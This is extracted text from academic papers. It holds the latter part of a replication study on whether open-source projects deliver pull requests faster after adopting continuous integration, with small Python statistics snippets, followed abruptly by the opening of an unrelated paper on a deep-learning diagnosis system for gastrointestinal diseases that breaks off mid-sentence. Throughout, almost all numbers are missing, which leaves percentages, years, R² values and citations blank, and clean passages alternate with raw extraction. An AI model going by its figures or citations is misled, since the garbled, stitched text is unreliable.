each project (before and after ci adoption), and evaluate the r metric for each model. r represents how much of the variability in the data can be explained using the model. following bernardo, da costa guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure bar chart plotting the variables with the highest explanatory power for each project, before (‘‘no-ci’’) and after (‘‘ci’’) ci adoption. only projects for which a regression model with r > . could be trained are considered. full-size doi: . /peerjcs. /fig- & kulesza ( ), we only accept models with r > . as sufficiently accurate. prior to ci adoption, the models for of projects ( . %) have r values higher than . (median of these is . ). 
After CI adoption, we achieve only valid models ( . %), with a median R² value of . . This is in line with our previous findings, and indicates that PR delivery time is in general rather unpredictable and unlikely to depend on any single factor. Figure depicts for how many projects (among those for which a sufficiently accurate model could be found) each variable is the one with the highest explanatory power, as measured through the Wald χ² maximum likelihood test. Our newly proposed variable "come-in time" indeed outperforms all variables from the original study. This further supports that the factor most important to the end-to-end delivery time of a PR is whether it has been merged close in time to the next release. It is also noticeable that all variables related to the nature of the PR or the contributor are less relevant than process- and project-oriented metrics, such as when a PR comes in, which position in the merge queue it has, or how large the merge workload currently is. It needs to be noted that there is a high correlation between the new metric "come-in time" and "queue rank", one of the metrics in the original study, in a subset of the projects. Namely, in of projects ( %) the correlation between these metrics is high prior to introducing CI, and in of projects ( %) after CI introduction. For the remaining projects, there is a correlation between these metrics, but it is less pronounced.

Box : Summary and lessons learned. Applying RDD to the original data set primarily revealed that two of the three analyzed metrics (DD and PL) follow very clear patterns, namely that they depend to a large degree on the time until the next release. Consequently, when in the release cycle a PR is merged is the best predictor of delivery time (PL). The merge delay MD does not follow such a pattern. We did not observe in any project that MD would trend up- or downwards independently of CI adoption, alleviating our original concern with the original study. However, our experiments also confirm the result from the original study that the delivery time is generally difficult to predict, as indicated by the low R² values of the regression models of most projects.

RQ : Generalizability

So far, we have applied all analyses to the data set also used in the original study. Now we turn towards evaluating whether the previous findings are specific to the used data.

Analysing new data (RQ .)

In a first step, we evaluate the generalizability of our findings by collecting new projects (which have also adopted CI) and conducting the same analyses as presented in 'RQ : Exact replication' and 'RQ : Conceptual replication'. We firstly again evaluate how many projects improved DD, MD, and PL, and use an MWW test to evaluate statistical significance. The results of this analysis are provided in Table , which also provides our own results from RQ as a point of comparison. We observe that the results are not fundamentally different, although we do observe some percentage-point differences in selected results (particularly related to the delivery delay DD). Effect sizes are small, as also observed for the original data.
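The before/after comparisons reported here rest on the Mann-Whitney-Wilcoxon test plus an effect-size measure. A minimal version of such a comparison is sketched below, using Cliff's delta as the effect size (one common choice for ordinal data); the function names and the split on a weekly timeline are assumptions for illustration only, not the replication's actual analysis code.

```python
import numpy as np
from scipy.stats import mannwhitneyu

def cliffs_delta(a, b):
    """Cliff's delta: P(a > b) - P(a < b) over all pairs, an effect size in [-1, 1]."""
    a, b = np.asarray(a, dtype=float), np.asarray(b, dtype=float)
    greater = (a[:, None] > b[None, :]).sum()
    less = (a[:, None] < b[None, :]).sum()
    return (greater - less) / (len(a) * len(b))

def before_after_comparison(values, weeks, cutoff_week):
    """MWW p-value and effect size for one metric, split at the CI adoption week."""
    values, weeks = np.asarray(values, dtype=float), np.asarray(weeks)
    before = values[weeks < cutoff_week]
    after = values[weeks >= cutoff_week]
    _, p_value = mannwhitneyu(before, after, alternative="two-sided")
    return p_value, cliffs_delta(after, before)
```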
A replication of our analysis of submitted, accepted, and released PRs confirms our finding that projects statistically significantly increase their development activities after adopting CI (with medium effect size), but we can again not find a statistically significant change in the number of releases. Finally, the re-execution of RDD (RQ .) on the new data yields similarly comparable results. A deeper discussion of this aspect is omitted here for reasons of brevity, but can be found in Guo ( ). An interesting result is found when fitting regression models, as discussed for RQ ., to the new data. For projects, only models ( . %) trained on data after CI adoption and models ( . %) trained on data before CI adoption achieve an R² value higher than the acceptance threshold. It remains unclear why the regression approach works even less well on the new data than on the original data. However, given that R² values were generally low even for the original data, this result may ultimately just stress that predicting delivery times is difficult at the best of times.

Analysing a control group (RQ .)

So far, we have experimented only with projects that actually adopted CI at some point in the project's lifetime. We now turn towards analysing our control group of comparable projects which, as far as we can observe, have never adopted CI.

Table : Results of a re-analysis using a new data set. For each metric (DD, MD, PL), the table lists the percentage of projects that are faster with CI and the percentage with statistically different results, for the original data, the new data, and the difference between them.

Table : Results of a re-analysis using a control group of projects which never introduced CI, with the same structure as the previous table (original data versus control data).

One challenge in this context is what point in the project's history to use as the cutoff for analysis. From analysing the projects in the original data set, we learn that these projects, on average, introduce CI after . % of the lifetime of the project in days (median %, variance . ). Hence, we introduce a "mock-CI-timepoint" for the projects in the control group that corresponds to % of their lifetime. Intuitively, this is the point in time when these projects would have, on average, adopted CI (if they ever did). A comparison of the results achieved for this control group with the results achieved for the original data set is provided in Table . Note that in this case "faster with CI" for the control group should be interpreted as "faster after the mock-CI-timepoint". The results of this analysis indicate that we do observe (slightly) larger differences between the original test group and the control group than what we have observed for the two different test groups in RQ . (cp. Table ). This supports the conclusion that the introduction of CI has some modest impact on these numbers. However, when analyzing the number of submitted, merged, and released PRs, we observe that there is no difference between before and after the (mocked) CI introduction. This is visualized in Fig. . Statistical testing does not reveal any differences before and after the mocked CI introduction for any metric.
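For control projects that never adopted CI, the comparison above needs an artificial cutoff. The following hedged sketch illustrates the mock-CI-timepoint idea and the per-release PR counts compared in the next paragraph; the lifetime fraction is passed in as a parameter because the exact average value used in the paper is not legible in this copy, and the date handling is a simplified stand-in for the study's data collection.

```python
import pandas as pd

def mock_ci_timepoint(first_activity, last_activity, lifetime_fraction):
    """Place the mock cutoff at a fixed fraction of the project's lifetime in days."""
    lifetime = last_activity - first_activity
    return first_activity + lifetime_fraction * lifetime

def prs_per_release(pr_delivery_dates, release_dates, cutoff):
    """Average number of delivered PRs per release before and after the cutoff."""
    prs = pd.Series(pd.to_datetime(pr_delivery_dates))
    releases = pd.Series(pd.to_datetime(release_dates))
    n_before = max(int((releases < cutoff).sum()), 1)
    n_after = max(int((releases >= cutoff).sum()), 1)
    return (prs < cutoff).sum() / n_before, (prs >= cutoff).sum() / n_after
```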
Figure : Comparison of merged and released PRs per release before and after CI introduction for a control group of projects that never introduced CI: (a) #submitted PRs/release; (b) #merged PRs/release; (c) #delivered PRs/release; (d) #releases/year.

Hence, we support the argument by Bernardo, da Costa & Kulesza ( ) that the introduction of CI seems to have a (minor) impact on the PR delivery time of projects. However, projects in both test groups manage to handle considerably more PRs per release after CI adoption, while we have not observed any statistically significant increase in the control group. Hence, we conclude that projects do not so much speed up handling individual PRs, but rather manage to handle considerably more PRs per release after adopting CI.

Box : Summary and lessons learned. Applying our analyses to new data sets allowed us to evaluate to what extent the effects observed so far are due to specifics of the data collected by Bernardo, da Costa & Kulesza ( ). When analyzing a new data set collected using the same methodology, we observed results that are in broad strokes similar to the original findings, although we observed differences of up to percentage points for individual metrics. When analyzing a control group of projects that never adopted CI, we found results not unlike those of the new test group, indicating that the small effect sizes we observed in RQ may be independent of CI introduction. However, we have observed that both test groups handle more PRs after CI adoption with medium effect size, while we have not observed a statistically significant increase for the control group. This leads us to believe that projects may not actually handle individual PRs (much) faster after CI adoption, but they are able to handle considerably more PRs per release.

Threats to validity

This section addresses potential threats to the validity of our replication and overall results.

Construct validity

Construct validity describes threats related to the design of the study. To a large degree, we have chosen the same data collection procedures, statistical methods, and analysis techniques that were already present in the original study. This was done by design, so as to keep our replication easily comparable to the original study. However, this also means that any limitations inherent in the original study design are still present in our replication (with the exception of those that we explicitly chose to address as part of our conceptual replication). For the construction of our control group, there are two related threats. (1) Even though we carefully attempted to determine whether a candidate project for the control group does indeed not use any CI system, it is not always feasible to determine this from an outsider's point of view (e.g., a company-backed OSS project may use a CI system within the company, which is not mentioned on the GitHub page). (2) Even though we attempted to keep the control group as similar in characteristics to the original study objects as possible, the mere fact that these projects have chosen not to adopt CI may already hint at deeper differences in mindsets, processes, and project goals than what is visible from GitHub metrics alone.
these differences may also account for some of the different results we have observed. further, our control group is considerably smaller than the original data set ( versus projects). external validity external validity concerns to what extent the findings of the study still hold under in more generalized circumstances. part of our replication was specifically to investigate a data set of new projects which adopted ci, and projects which are not using ci. however, we used the same data collection procedure and sampling methods to select these projects. hence, our replication does not aim to, and cannot, answer the question if the observed results are specific to oss software, to high-profile projects, or to projects written in the java, python, php, ruby, or javascript programming languages. further, it should be noted that we only consider projects that make use of travis-ci. hence, it remains an open question to what extent our results also generalize to projects using other ci systems, such as gitlab https://about.gitlab.com or jenkins https://jenkins.io. internal validity internal validity questions to what extent the study is able to draw correct conclusions, and does not fall prey to, for instance, confounding factors. one of the key motivations of our replication was to evaluate whether normal changes in projects over the lifetime of the project may be responsible for the effects observed in the original study. this concern was alleviated in our replication. however, other confounding factors may still remain relevant. particularly concerning in this regard is that our evaluation of a control group of projects that never applied ci has shown results that, ultimately, were not fundamentally different than what we observed for a new data set of ci-using projects. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://about.gitlab.com https://jenkins.io http://dx.doi.org/ . /peerj-cs. hence, we see the need for more work to fully establish the effects of adopting ci in oss projects. conclusions in this work, we replicated an original study by bernardo, da costa & kulesza ( ) that attempted to answer the question whether oss projects deliver prs faster after adopting ci. our replication was motivated by limitations in the original study design, which did not account for changes in pr delivery time independent of ci introduction. we conducted an exact replication of the original work, analyzed the original data using a different statistical procedure (rdd), and extended the original multiple regression model using a new variable (‘‘come-in time’’). further, we analyze two new data sets, a new set of study subjects that adopted ci and a control group of projects that did not. we were able to replicate the original findings. our analysis using rdd has not shown any evidence of growth of pr delivery times independent of ci introduction, and our analysis of control group data has revealed that projects which never adopted ci do not see the same increase in submitted, merged, and released prs as seen for ci-using projects. however, our study also confirms that the impact of ci on the delivery time for an individual pr is only minor. this is in line with the original study, which has also reported primarily small statistical effect sizes. we further find that, before as well as after ci adoption, the best predictor of pr delivery times is when in the release cycle a pr is merged. 
this indicates that, ultimately, projects need to increase the number of releases to speed up pr delivery times rather than adopt ci. however, the number of releases appears to be largely independent of whether or not a project adopts ci. acknowledgements this work has been conducted as a master project while the first author was a student at chalmers university of technology. additional information and declarations funding this work has received financial support by the swedish research council vr under grant number - (developer-targeted performance engineering for immersed release and software engineers). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: swedish research council vr under grant number - (developer-targeted performance engineering for immersed release and software engineers). competing interests philipp leitner is an academic editor for peerj computer science. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • yunfang guo conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • philipp leitner conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: all data is available on github: https://github.com/radialine/do-open-source- projects-deliver-pull-requests-faster-using-ci. references bacchelli a, bird c. . expectations, outcomes, and challenges of modern code review, icse ’ . in: proceedings of the international conference on software engineering. piscataway: ieee press. basili vr, shull f, lanubile f. . building knowledge through families of experi- ments. ieee transactions on software engineering ( ): – doi . / . . bernardo jah, da costa da, kulesza u. . studying the impact of adopting continuous integration on the delivery time of pull requests. new york: acm, – doi . / . . duvall pm, matyas s, glover a. . continuous integration: improving software quality and reducing risk. london: pearson education. gousios g, pinzger m, van deursen a. . an exploratory study of the pull-based software development model. in: icse proceedings of the th international conference on software engineering. – . guo y. . the impact of adopting continuous integration on the delivery time of pull requests—a partial replication and extension. gothenburg, sweden: department of computer science and engineering, chalmers university of gothenburg. hilton m, tunnell t, huang k, marinov d, dig d. . usage, costs, and benefits of continuous integration in open-source projects. in: proceedings of the st ieee/acm international conference on automated software engineering. piscataway: ieee, – . imbens gw, lemieux t. . regression discontinuity designs: a guide to practice. journal of econometrics ( ): – doi . /j.jeconom. . . . juristo n, gómez os. . replication of software engineering experiments. in: empirical software engineering and verification. springer-verlag berlin/heidelberg: international summer schools, laser – , – . laukkanen e, paasivaara m, arvonen t. . stakeholder perceptions of the adoption of continuous integration–a case study. 
in: agile conference. piscataway: ieee, – . guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/radialine/do-open-source-projects-deliver-pull-requests-faster-using-ci https://github.com/radialine/do-open-source-projects-deliver-pull-requests-faster-using-ci http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.jeconom. . . http://dx.doi.org/ . /peerj-cs. manglaviti m, coronado-montoya e, gallaba k, mcintosh s. . an empirical study of the personnel overhead of continuous integration. in: msr ’ proceedings of the th international conference on mining software repositories. – . mcintosh s, kamei y, adams b, hassan ae. . the impact of code review coverage and code review participation on software quality: a case study of the qt, vtk, and itk projects. in: proceedings of the th working conference on mining software repositories, msr . new york: acm, – doi . / . . miller a. . a hundred days of continuous integration. in: agile conference. parsons d, ryu h, lal r. . the impact of methods and techniques on outcomes from agile software development projects. in: organizational dynamics of technology- based innovation: diversifying the research agenda. – . romano j, kromrey j, coraggio j, skowronek j. . appropriate statistics for ordinal level data: should we really be using t-test and cohensd for evaluating group differ- ences on the nsse and other surveys? in: annual meeting of the florida association of institutional research. shepperd m. . replication studies considered harmful. in: proceedings of the th international conference on software engineering: new ideas and emerging results, icse- nier ’ . new york: acm, – doi . / . . shull f, basili v, carver j, maldonado jc, travassos gh, mendona m, fabbri s. . replicating software engineering experiments-addressing the tacit knowledge problem. in: proceedings international symposium on empirical software engineering. . shull fj, carver jc, vegas s, juristo n. . the role of replications in empirical software engineering. empirical software engineering ( ): – doi . /s - - - . stolberg s. . enabling agile testing through continuous integration. in: agile conference. ståhl d, bosch j. . modeling continuous integration practice differences in industry software development. journal of systems and software : – . thistlethwaite dl, campbell dt. . regression-discontinuity analysis: an alternative to the ex post facto experiment. journal of educational psychology ( ): – doi . /h . vasilescu b, schuylenburg sv, wulms j, serebrenik a, van den brand mg. . continuous integration in a social-coding world: empirical evidence from github. in: software maintenance and evolution (icsme), ieee international conference on ieee. piscataway: ieee. vasilescu b, yu y, wang h, devanbu p, filkov v. . quality and productivity outcomes relating to continuous integration in github. in: proceedings of the th joint meeting on foundations of software engineering - esec/fse . yu y, wang h, filkov v, devanbu p, vasilescu b. . wait for it: determinants of pull request evaluation latency on github. in: ieee/acm th working conference on mining software repositories. piscataway: ieee. guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /h http://dx.doi.org/ . /peerj-cs. yu y, yin g, wang t, yang c, wang h. . determinants of pull-based development in the context of continuous integration. 
science china information sciences : doi . /s - - - . zhao y, serebrenik a, zhou y, filkov v, vasilescu b. . the impact of continuous integration on other software development practices: a large-scale empirical study. in: proceedings of the nd ieee/acm international conference on automated software engineering. piscataway: ieee, . guo and leitner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. gastro-cadx: a three stages framework for diagnosing gastrointestinal diseases gastro-cadx: a three stages framework for diagnosing gastrointestinal diseases omneya attallah and maha sharkas department of electronics and communication engineering, college of engineering and technology, arab academy for science, technology and maritime transport, alexandria, egypt abstract gastrointestinal (gi) diseases are common illnesses that affect the gi tract. diagnosing these gi diseases is quite expensive, complicated, and challenging. a computer-aided diagnosis (cadx) system based on deep learning (dl) techniques could considerably lower the examination cost processes and increase the speed and quality of diagnosis. therefore, this article proposes a cadx system called gastro-cadx to classify several gi diseases using dl techniques. gastro-cadx involves three progressive stages. initially, four different cnns are used as feature extractors to extract spatial features. most of the related work based on dl approaches extracted spatial features only. however, in the following phase of gastro-cadx, features extracted in the first stage are applied to the discrete wavelet transform (dwt) and the discrete cosine transform (dct). dct and dwt are used to extract temporal-frequency and spatial-frequency features. additionally, a feature reduction procedure is performed in this stage. finally, in the third stage of the gastro-cadx, several combinations of features are fused in a concatenated manner to inspect the effect of feature combination on the output results of the cadx and select the best-fused feature set. two datasets referred to as dataset i and ii are utilized to evaluate the performance of gastro-cadx. results indicated that gastro-cadx has achieved an accuracy of . % and . % for dataset i and ii respectively. the results were compared with recent related works. the comparison showed that the proposed approach is capable of classifying gi diseases with higher accuracy compared to other work. thus, it can be used to reduce medical complications, death-rates, in addition to the cost of treatment. it can also help gastroenterologists in producing more accurate diagnosis while lowering inspection time. subjects bioinformatics, artificial intelligence, computer vision, data mining and machine learning keywords gastrointestinal (gi) diseases, deep learning, convolution neural network, computer aided diagnosis introduction gastrointestinal (gi) disease is considered one of the supreme common diseases that usually infect people, causing complicated health conditions (du et al., ). based on the degree of injury, gi can approximately split into the precancerous lesion, primary gi cancer and progressive gi cancer, and benign gi diseases (sharif et al., ). among benign gi diseases are ulcers, gastritis, and bleedings which will not depreciate into cancers in short term. in contrast, precancerous gi injury could depreciate into primary gi cancer how to cite this article attallah o, sharkas m. . 
gastro-cadx: a three stages framework for diagnosing gastrointestinal diseases. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author omneya attallah, o.attallah@aast.edu academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright attallah and sharkas distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:o.�attallah@�aast.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ or even progressive gi cancer, in case it was not accurately diagnosed and treated in time (du et al., ). annually almost . million patients are diagnosed with gastric cancer. since , , new gi diseases arose in america. a global survey indicated that since , , deaths occurred due to stomach cancer, , deaths are due to colon cancer. the poorest situations can be detected in the developing countries (e.g., the asian countries and the middle east) (ali et al., ; khan et al., a). moreover, among people diseased with gi diseases, % of them are from china, % from brazil, % from russia, % of eu, and % of the us (sharif et al., ). the early diagnosis of gi is essential to reduce medical complications, cost of treatment, and lower death rates. the traditional clinical method used for gi diagnosis is the intestinal biopsy of the gi tract. these biopsy samples are analyzed by medical experts using microscopes to examine the possibility of any cancerous or abnormal cells’ existence. the drawbacks of such a method are being invasive and the necessity of a high degree of proficiency (ali et al., ). in contrast, endoscopic imaging is a lower invasive technique for visualizing the gi tract (kainuma et al., ). the endoscopic process assists the doctor in the recognition and diagnosis of gastric anomalies in their initial stages. timely detection and diagnosis of chronic medical conditions can be healed with appropriate treatments. hence, the imaging procedure can be very beneficial for a considerable decrease in medical complications, the cost of treatment, and death-rates, especially, the deaths that happen due to several gi cancers, which could be treated if cancer was discovered in its pre-malignant phase (hamashima et al., ). although there are numerous advantages in endoscopy, it brings along with it particular trade-offs; for example, the huge number of video frames produced during the screening process of the gi tract. on average, the entire process can take from min to h depending on the aimed gi region and the expertise of the gastroenterologist (ali et al., ). the number of generated frames can reach up to , images. most of these frames are redundant and not valuable and only a few images might have some abnormal lesions (khan et al., b). all these redundant images can be removed by examining each frame of the endoscopic video. therefore, the manual examination of diseases through such a huge number of images is very challenging as it needs an extensive amount of time to observe the complete number of frames. besides, at times the anomalous frames can be simply unnoticed by the gastroenterologist which can cause misdiagnosis. 
therefore, such medical experts request automated schemes, that can automatically determine possible malignancies by analyzing the entire endoscopic images (aoki et al., ). computer-aided diagnosis (cadx) are systems utilized for automatic diagnosis of several diseases within various parts of the human body like the brain (attallah, sharkas & gadelkarim, , ), breast (ragab, sharkas & attallah, ), lung (attallah, ragab & sharkas, ), etc. along with these diseases, cadx has been commonly used to diagnose gi disease in the intense by analyzing endoscopic images (khan et al., b). such cadx has several advantages from which the patients, gastroenterologists, and medical students can benefit. these include; the reduction in the examination time of the whole endoscopic frames. besides, the decrease in the cost of treatment as the lesion will be detected in an early phase. moreover, cadx will improve the accuracy of the attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ diagnosis of gi diseases compared to manual examination. also the inspection time from endoscopic images is to be decreased. furthermore, it may be used for training medical staff and students without the necessity of an expert (ali et al., ). in a cadx scheme, the diagnosis is carried out using each frame depending on the significant features taken out from the image. thus, feature extraction is the key step in an accurate diagnosis of medical conditions (attallah, ) like gi diseases (khan et al., b; ali et al., ; khan et al., ). several features are calculated using handcrafted techniques in the literature like color-based, texture-based, and some others (khan et al., b; ali et al., ). karargyris & bourbakis ( ) utilized geometric and texture features extracted from susan edge detector and gabor filter extraction methods to detect small bowel polyps and ulcers. on the other hand, li & meng ( a) used the uniform local binary pattern (lbp) and discrete wavelet transform (dwt). they employed an svm classifier to detect abnormal tissues. in the same way, the authors in li & meng ( b) detected tumors in the intestine using dwt and lbp. instead, yuan & meng ( ) fuzed the saliency map with the bag of features (bof) technique to identify polyps in endoscopic images. initially, the authors employed the bof method to describe the local features by using a scale-invariant feature transform (sift) feature vectors using k-means clustering. next, the saliency map histogram method was utilized to extract salience features. lastly, both features are combined and utilized to learn an svm classifier. later the same authors (yuan, li & meng, ) added the complete lbp (clbp), lbp, uniform lbp (ulbp), and histogram of oriented gradients (hog) features along with sift features to extract additional distinctive texture features. alternatively, color-based features were extracted in (ghosh, fattah & wahid, ; deeba et al., ) for bleeding detection. recently, the advancement of deep learning (dl) methods has delivered new opportunities to improve the analysis of endoscopic images. cnns are the most type of networks used in endoscopy (alaskar et al., ). these networks can be used as classifiers or/and feature extractors. feature extraction methods based on dl techniques have been extensively utilized in the literature (ghatwary, zolgharni & ye, ; kim, cho & cho, ; lee et al., ). the authors of khan et al. ( a) proposed a cadx system to detect ulcers and bleeding gi diseases. 
their system extracted deep features from two different layers of vgg- cnn. afterward, these features were fused, and then significant features were selected using an evolutionary search method called pso. these features were then used to train the svm classifier. igarashi et al. ( ) proposed a cadx framework to classify several gi diseases using alexnet. first, alexnet extracted spatial features and then classified them into different diseases. the authors of alaskar et al. ( ) proposed a dl-based cadx that utilized alexnet and googlenet for ulcer detection from low contrast endoscopic videos (wev). features extracted from these networks were classified using the fully connected layer of each network separately. alexnet was also used in (fan et al., ) to detect both erosions and ulcers that are observed in the intestine. he et al. ( ) introduced a framework based on two cascaded cnns. the first network is vgg- cnn which was used for edge detection, whereas the second is the inception cnn which was used for classification. similarly, attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ khan et al. ( b) used two cnns, the first one is recurrent cnn for segmentation, whereas, the second was resnet and was used for classification. the authors in yuan & meng ( ) suggested the use of an image manifold with stacked sparse auto-encoder to recognize polyps in endoscopic images. instead, the authors in pei et al. ( ) proposed a cadx system to recognize and assess the small bowel using features extracted from long short-term memory (lstm). other research articles suggested the fusion of handcrafted features and dl features. sharif et al. ( ) proposed a cadx system for classifying gi infections. the authors extracted deep features from vgg- and vgg- cnns and fused these features with some geometric features. these fused features were then used as input to a k-nearest neighbors (knn) classifier. another system was presented in ghatwary, ye & zolgharni ( ) to detect esophageal cancer. the system fuzed gabor features and faster region-based cnn (faster r-cnn). on the other hand, billah, waheed & rahman ( ) fuzed the color wavelet features and cnn features for detecting polyps. the combined features were used later to fed an svm classifier. the authors in nadeem et al. ( ) combined features extracted from textural analysis methods such as haralick and lbp along with vgg- cnn dl features. the authors used logistic regression for classification. the authors of majid et al. ( ) introduced a framework that combined the dct, dwt, color-based statistical features, and vgg dl features for the recognition of several gi diseases. the authors used a genetic algorithm (ga) to select features using the knn fitness function. finally, the selected features were used to train an ensemble classifier. a summary of recent related work along with their limitations is shown in table . the main aim of this work is to construct a cadx called gastro-cadx that is capable of accurately diagnosing more gi diseases than the proposed by others. though there are various approaches to gi detection and classification in the literature, there exist some weaknesses among these methods which are summarized in table. gastro-cadx tries to overcome the limitations found in related studies discussed in table through three cascaded stages. 
first of all, the majority of the current methods studied the detection and classification of a few types of gi anomalies, disease, or anatomical landmark. but, our proposed gastro-cadx is an automatic highly accurate system to classify several gi diseases and anatomical landmarks. some of the related studies are based on small dataset or used only one dataset to test the efficiency of their classification model, while gastro-cadx is validated using two large datasets of several gi diseases. the few articles that classified several gi diseases achieved low accuracy, not reliable, or used only one type of cnn, whereas, gastro-cadx is an accurate and reliable system that used more four cnns. this article in the first stage, gastro-cadx studies several cnn based methods for feature extraction from spatial domain instead of using one or two networks to benefit from the advantages of several types of cnns. the previous studies were either based only on an end-to-end deep learning which has very high computational cost, used only spatial features extracted from cnns or only handcrafted feature extractions, but gastro-cadx is not based only on spatial features, but temporal-frequency and spatial-frequency features using handcrafted feature extraction methods as well not only attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a summary of recent related studies. article purpose class method accuracy (%) limitation khan et al. ( b) ulcer, polyp, bleeding detection rcnn, resnet , and svm . � used only spatial features. � low segmentation accuracy for the ulcer regions. � fail for the segmentation of polyp and bleeding regions. khan et al. ( a) ulcer, and bleeding detection vgg- , pso, and svm . � limited classes � used only spatial features. � high computational cost igarashi et al. ( ) classify several gi diseases alexnet . � used only spatial features. � the training or test data included chosen images of gastric cancer lesions, which could cause a selection bias. � has high computational cost � cannot be used in real-time examinations alaskar et al. ( ) ulcer detection alexnet & google net . � limited classes. � used only spatial features owais et al. ( ) classification of multiple gi diseases resnet- and lstm . � high computational cost. � used individual type of features � low accuracy fan et al. ( ) ulcer and erosion detection alexnet . . � limited classes. � used only spatial features. � used only one type of cnn features � the cadx was applied separately for ulcer and erosion detection he et al. ( ) hookworm detection vgg- and inception . � limited classes. � used only spatial features � low accuracy yuan & meng ( ) polyps detection stacked sparse auto-encoder with image manifold � limited classes. � used only spatial features pei et al. ( ) bowel detection and assessment lstm and pca . � limited classes. � used only temporal features. � used only one type of cnn features � low accuracy � small dataset (continued) attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ end-to-end based dl. this appears clearly in the second stage of gastro-cadx. it extracts handcrafted features based on textural analysis from the temporal-frequency and spatial-temporal domains using the dl features extracted in the first stage. this reduces the high computational cost of end-to-end dl techniques. 
previous related studies indicated that cnn representations have improved the performance and the abstract level for the automatic detection and classification of gi diseases (majid et al., ; khan et al., b; yuan & meng, ). nevertheless, the fusion of cnn features with handcrafted variables could enhance diagnostic accuracy (majid et al., ; table (continued). article purpose class method accuracy (%) limitation sharif et al. ( ) ulcer, and bleeding detection vgg- , vgg- , geometric features, knn . � limited classes. � small dataset. � used spatial and geometric features only ghatwary, ye & zolgharni ( ) esophageal cancer detection gabor filter. faster r-cnn, and svm � limited classes. � used only one type of cnn features � used spatial and textural based -gabor features only. � high computational cost billah, waheed & rahman ( ) polyps detection color based dwt, cnn, and svm . � limited classes. � used only one type of cnn features � used spatial and color based –dwt only � small dataset nadeem et al. ( ) classification of several gi diseases vgg- , haralick and lbp texture analysis, and logistic regression � low accuracy � used only one type of cnn features � used spatial features based on cnn and textural analysis only majid et al. ( ) bleeding, esophagitis, polyp, and ulcerative- colitis classification dct, color based statistical features, dwt, vgg- , ga, and e . � high computational cost. � used only one type of cnn dl features nguyen et al. ( ) classifying images to normal and abnormal densenet, inception, and vgg- . � classify images to either normal or abnormal. � did not classify several gi diseases. � low accuracy owais et al. ( ) classification of multiple gi diseases densenet and lstm . � high computational cost. � used individual type of features attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ shi et al., ). therefore, in the third stage, a fusion process is introduced which combines the second stage features to benefit from the spatial, temporal- frequency, and spatial-frequency features. this stage can confirm the capacity of every feature abstraction method to mine significant information that might be disregarded from the other method. it can also reduce the computational cost compared to end-to-end dl methods. the previous contributions are summarized to: � proposing an automatic and accurate cadx system called gastro-cadx based on three stages to classify several gi diseases and anatomical landmarks. � the system is not based only on spatial features, but temporal-frequency and spatial-frequency features using handcrafted feature extraction methods as well. � in the first stage, gastro-cadx studies several cnn based methods for feature extraction from spatial domain instead of using one or two networks to benefit from the advantages of several types of cnns. � in the second stage, gatro-cadx extracts handcrafted features based on textural analysis from the temporal-frequency and spatial-temporal domains using the dl features extracted in the first stage. � also, in the second stage, gastro-cadx tries to minimize the problem of computational time using only reduced dimensions of features. � in the third stage, a fusion process is introduced which combines the second stage features to benefit from the spatial, temporal-frequency, and spatial-frequency features. 
� the third stage can confirm the capacity of every feature abstraction method to mine significant information that might be disregarded from the other method. � gastro-cadx is validated using two large datasets of several gi diseases. � creating an accurate automatic diagnostic system that is reliable compared to related cadx systems. materials and methods dataset description this article employs two datasets to evaluate the performance of gastro-cadx. the first dataset used in this article is called kvasir (pogorelov et al., ), and denoted as dataset i. it consists of , images containing eight different gi classes. three classes demonstrating anatomical landmarks, three demonstrating pathological states, and two associated with lesion-removal. the three anatomical landmark categories are pylorus, z-line, and cecum. the three diseased states are esophagitis, polyps, and ulcerative colitis. the two classes associated with lesion removal are dyed lifted polyps and dyed resection margins. the images are of different sizes from × up to , × , pixels. some of these images include a green region illustrating the location and shape of the endoscope within the intestine. this information may be significant for later investigations (thus included) but must be wielded with care for the detection of the endoscopic findings. figure shows different image samples of different gi diseases. attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the second dataset is called hyperkvasir (borgli et al., ) and named dataset ii. the images and videos of this dataset were acquired using standard endoscopy equipment from olympus (olympus europe, hamburg, germany) and pentax (pentax medical europe, hamburg, germany) at a norwegian hospital from to . the dataset consists of , labeled images and classes. these classes are unbalanced; therefore, we chose only balanced classes to construct gastro-cadx. four classes demonstrating anatomical landmarks, three demonstrating pathological states, one demonstrating quality of mucosal views, and two associated with lesion-removal. the three anatomical landmark categories are pylorus, 